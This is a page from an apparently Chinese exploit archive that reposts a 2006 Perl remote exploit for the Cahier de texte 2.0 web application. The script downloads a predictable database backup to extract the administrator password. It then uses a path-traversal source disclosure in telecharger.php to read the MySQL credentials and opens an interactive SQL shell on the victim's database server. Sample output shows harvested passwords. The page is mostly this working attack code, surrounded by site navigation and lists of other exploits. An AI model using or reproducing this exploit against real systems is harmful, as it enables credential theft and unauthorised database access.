首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit
来源:acid-root.new.fr 作者:DarkFig 发布时间:2006-11-27  

#!/usr/bin/perl
#
#
# INFORMATIONS
# ============
# Affected.scr..: Cahier de texte V2.0
# Poc.ID........: 15061124
# Type..........: Predictable backup filename, Source disclosure
# Risk.level....: High
# Conditions....: register_globals = on
# Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_de_texte/
# Poc.link......: acid-root.new.fr/poc/15061124.txt
# Credits.......: DarkFig
# Note..........: Coded for fun
#
#
# SCREENSHOT
# ==========
# header> Cahier de texte V2.0 SQL Code Execution Exploit
# header> -----------------------------------------------
# status> Searching the backup file
# sploit> Administrateur::epolas
# status> Downloading database informations
# sploit> Host::sql.mysite.com
# sploit> Database::cahier_de_texte
# sploit> Username::root
# sploit> Password::toor
# status> Contacting the mysql server
# _mysql> select * from cdt_prof
# +-------+--------------+---------+
# |ID_prof|nom_prof |passe |
# +-------+--------------+---------+
# | 1|Administrateur|epolas |
# | 2|DarkFig |crazypass|
# +-------+--------------+---------+
# 2 rows processed
#
# _mysql> exit
#
use MySQL;
use Getopt::Long;
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Request::Common;

print STDOUT "\nheader> Cahier de texte V2.0 SQL Code Execution Exploit";
print STDOUT "\nheader> ", "-" x 47, "\n";

$opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);

if(!$host) {
print STDOUT "header> Usage: ./xXx.pl --host=[www] --path=[/] [Opts]\n";
print STDOUT "header> [Opts] --proxh=[ip] --proxu=[user] --proxp=[pwd]\n";
exit(1);
}

$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";

$ua = LWP::UserAgent->new();
$ua->agent('0xzilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;
$re->proxy_authorization_basic($proxu, $proxp) if $proxp;

# First vulnerability
# ===================
# The backup's filename is allways the same
# If the file is protected by a .htaccess file,
# use the source disclosure vulnerability to get it.
# There is also all members passwords but here we
# just take the administrator password.

print STDOUT "status> Searching the backup file\n";
$re = GET $host.$path.'administration/dump.sql';
$res = $ua->request($re);

if($res->as_string !~ /HTTP\/1.(x|1) 404 Not Found/) {
if($res->content =~ /INSERT INTO cdt_prof VALUES\(1, 'Administrateur', '(.*?)'\);/) {
print STDOUT "sploit> Administrateur::$1\n";}} else {
print STDOUT "sploit> None backup found\n";}

# Second vulnerability
# ====================
# Source disclosure in administration/telecharger.php

print STDOUT "status> Downloading database informations\n";
$ch = '../Connections/conn_cahier_de_texte.php&Fichier_a_telecharger=';
$re = GET $host.$path."administration/telecharger.php?chemin=$ch";
$res = ($ua->request($re))->content;

if($res =~ /\$hostname_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
)\$database_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
)\$username_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
)\$password_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)/) {

$mhost=$3; $database=$8; $username=$13; $password=$18;
print STDOUT "sploit> Host::$mhost\nsploit> Database::$database\n";
print STDOUT "sploit> Username::$username\nsploit> Password::$password\n";} else {
print STDOUT "sploit> Exploit failed\n";
exit(1);}

if($mhost =~ /^(localhost|127\.0\.0\.1)$/ or !$mhost) {
print STDOUT "sploit> MySQL server is localhost\n";
exit(1);}

# Third step
# ==========
# Trying a connection with the MySQL server

print STDOUT "status> Contacting the mysql server\n";
$dbh = Mysql->connect($mhost, $database, $username, $password);
$dbh->selectdb($database);

while() {
print STDOUT "_mysql> ";
chomp($query = <STDIN>);

$query =~ /^(exit||quit)$/ ? exit(0) : 0x2727;
$res = $dbh->query($query) ? $dbh->query($query) : $dbh->errmsg();
$res != $dbh->errmsg() ? print $res->as_string : 0x2727;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP-Nuke NukeAI Module 3b (uti
·SIPfoundry sipXtapi (CSeq) Rem
·fipsCMS <= 4.5 (index.asp)
·X7 Chat <= 2.0.4 (old_prefi
·XMPlay 3.3.0.4 (ASX Filename)
·Solaris <= 10 sysinfo() Loc
·ContentNow 1.39 (pageid) Remot
·Etomite CMS <= 0.6.1 (usern
·XMPlay <= 3.3.0.4 (PLS) Loc
·Etomite CMS <= 0.6.1 (rfile
·e-Ark 1.0 (src/ark_inc.php) Re
·libmikmod <= 3.2.2 (GT2 loa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved